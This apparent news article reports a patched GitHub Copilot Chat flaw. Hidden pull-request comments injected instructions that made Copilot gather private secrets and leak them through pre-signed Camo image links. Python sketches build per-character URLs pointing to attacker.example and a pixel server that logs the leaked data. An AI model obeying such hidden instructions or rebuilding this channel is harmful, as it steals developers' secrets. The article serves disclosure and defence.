Cybersecurity News Hub

GitHub Copilot Chat Flaw Let Private Code Leak Via Images

By Cyberinchief
October 10, 2025


Artificial Intelligence & Machine Learning, Next-Generation Technologies & Secure Development


Researcher Found Bug Could Exfiltrate Secrets Via Camo Images

Rashmi Ramesh (rashmiramesh_) • October 9, 2025

Image: PJ McDonnell/Shutterstock

A now-patched flaw in GitHub Copilot Chat could have enabled attackers to steal source code and secrets by embedding hidden prompts that hijacked the artificial intelligence assistant’s responses. The exploit also used the repository platform’s image proxy to leak the stolen data.


The vulnerability, discovered by Legit Security researcher Omer Mayraz, combined a remote prompt injection with an inventive bypass of GitHub’s content security policy. It used Camo, the platform’s image proxying service, to pull private data out of repositories.

GitHub Copilot Chat is an AI assistant built into GitHub that helps developers by answering questions, explaining code and suggesting implementations directly in their workflow.

The flaw combined two issues. First, hidden pull-request comments and other content that Copilot read were not properly isolated or validated. Second, the way GitHub’s image proxy handled external images could be abused. By preparing signed image links and having Copilot assemble them, the researcher was able to turn a security feature into a channel for stealing data.


The researcher said he reported the issue through HackerOne. GitHub responded by disabling image rendering in Copilot Chat and said the vulnerability was fixed as of Aug. 14.

Copilot Chat’s usefulness stems from its context awareness. It reads repository files, pull requests and other workspace artifacts so it can tailor answers to a developer’s code. The researcher made Copilot “notice” an injected instruction by hiding a prompt inside a pull request description. GitHub supports hidden content through an official feature for comments. When the researcher moved the prompt into a concealed comment, the assistant still picked it up. The injected instruction affected other users who visited the pull request page, demonstrating that hidden prompts could influence Copilot responses for anyone who loaded the same context.
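The "hidden content" feature described above relies on the fact that GitHub-flavored Markdown does not render HTML comments. A minimal illustration of the idea, where the injected instruction is a hypothetical placeholder rather than the researcher's actual payload:

```python
# Illustrative sketch: HTML comments in GitHub-flavored Markdown are not
# rendered, so a reviewer sees only the visible text, while the raw pull
# request body (which an AI assistant may ingest) contains everything.
visible = "Fixes a typo in the README."
hidden = "<!-- hypothetical injected instruction would go here -->"
pr_description = f"{visible}\n\n{hidden}"

# The rendered page shows only `visible`; an assistant reading the raw
# body sees `hidden` as well.
```
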

“Our research was limited to pull-request comments, which is an interface any developer on the planet can utilize against open-source projects,” said Liav Caspi, CTO and co-founder of Legit Security. “There might be other places where hidden prompts can be embedded, but the attack chain will be much harder for an anonymous actor.”

Once Copilot read the hidden instruction, the attacker could make it display messages, suggest fake code, or insert links and images in its replies. Since Copilot has the same access as the user running it, the hidden commands could tell it to search private code for sensitive information, turn that data into readable text and include it in its responses.

GitHub usually blocks web pages from loading images from unknown sites and routes any external images through its own proxy, Camo. When a user adds an external image, GitHub converts the link into a camo.githubusercontent.com address with a cryptographic signature, allowing only those signed links to be accessed. That setup stops outsiders from tricking a browser into fetching attacker-controlled content directly from a user’s session.
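The open-source Camo project pairs an HMAC digest of the target URL with a hex encoding of that URL, so only links minted with the server's secret are honored. A rough sketch of that scheme, with a made-up secret (the production service may differ in details):

```python
import hashlib
import hmac

def camo_style_url(proxy_host: str, secret: bytes, image_url: str) -> str:
    # HMAC-SHA1 over the target URL: the proxy recomputes this digest and
    # refuses to fetch anything whose signature does not match.
    digest = hmac.new(secret, image_url.encode(), hashlib.sha1).hexdigest()
    # Hex-encode the target URL so it travels safely in the path.
    return f"https://{proxy_host}/{digest}/{image_url.encode().hex()}"

url = camo_style_url("camo.githubusercontent.com", b"demo-secret",
                     "https://attacker.example/a.png")
```

Because the digest depends on the exact URL, an outsider without the secret cannot construct a valid proxy link to a new host, which is precisely why the researcher had to pre-generate signed links instead.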

The researcher found a way around GitHub’s image protections by creating pre-approved image links for letters and symbols. He trained Copilot to use these images like pieces in a puzzle to spell out text. Each image linked to the researcher’s server, so when GitHub’s proxy loaded the images, it sent along the encoded data hidden inside them.
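Conceptually, the "alphabet of images" works like the sketch below, where `sign()` stands in for whatever produces a Camo-approved link and the attacker host is hypothetical:

```python
def build_alphabet(sign, chars="abcdefghijklmnopqrstuvwxyz0123456789_"):
    # One pre-signed image URL per character the attacker wants to spell.
    return {c: sign(f"https://attacker.example/{c}.png") for c in chars}

def spell(secret: str, alphabet: dict) -> list:
    # Emitting these images in order makes the proxy fetch them in order,
    # so the attacker's server receives the secret one character at a time.
    return [alphabet[c] for c in secret.lower() if c in alphabet]

alphabet = build_alphabet(lambda u: u)  # identity stands in for real signing
images = spell("AWS_KEY", alphabet)
```

Each fetch is individually a legitimate, signed request; only the sequence of requests, observed on the attacker's server, reconstructs the secret.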

“Technically, yes,” Caspi said when asked if similar image proxies could be abused elsewhere. “The concept that was found is the ability to steal data by making the AI download images and encoding the message in the download requests. It is likely that it is possible to manipulate other AI systems in a similar way – ask the agent to perform a series of seemingly innocent tasks on sensitive input, which can leak that sensitive data to a threat actor.”

To actually steal data, the researcher converted pieces of private code into a simple text format and embedded them in the pre-approved image links, adding random numbers to prevent caching. On the attacker's side, a basic web server sent back invisible 1x1-pixel images, so nothing showed up in the user’s chat. As GitHub’s proxy fetched the images, it carried along the encoded data, bypassing the usual browser security rules.
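The receiving side needs nothing more than a server that logs each request path and answers with an invisible pixel. A minimal sketch (host, port and paths are hypothetical):

```python
from http.server import BaseHTTPRequestHandler, HTTPServer

# Smallest well-known transparent 1x1 GIF (43 bytes).
PIXEL = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00"
         b"!\xf9\x04\x01\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00"
         b"\x00\x02\x02D\x01\x00;")

class PixelHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # The path itself carries the exfiltrated character (plus a random
        # cache-busting number); the body is an invisible pixel, so the
        # victim's chat shows nothing.
        print("received:", self.path)
        self.send_response(200)
        self.send_header("Content-Type", "image/gif")
        self.send_header("Content-Length", str(len(PIXEL)))
        self.end_headers()
        self.wfile.write(PIXEL)

# To run: HTTPServer(("0.0.0.0", 8080), PixelHandler).serve_forever()
```
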

The researcher proved the method could find specific secrets, for example an AWS_KEY token, and send them out of private repositories. The attack could also manipulate Copilot for other users, showing formatted text, code and links that looked legitimate.

“Had it not been patched by GitHub, it is very likely this manipulation could be carried out by a threat actor without getting caught,” Caspi said. “The only caveat is that it can be used to steal a small piece of data, like a secret token or security issue, but not large-scale code theft.”

Caspi said Copilot users can take basic hardening steps, such as reviewing data before sending it and configuring proper ‘ignore’ files that deny access to sensitive files. But he added that prompt injection is hard to defend against, and only network monitoring can ultimately reveal whether an AI system is sending sensitive information to a third party.






Tags: Chat, Code, Copilot, Flaw, GitHub, Images, Leak, Private
© 2025 All rights reserved by cyberinchief.com
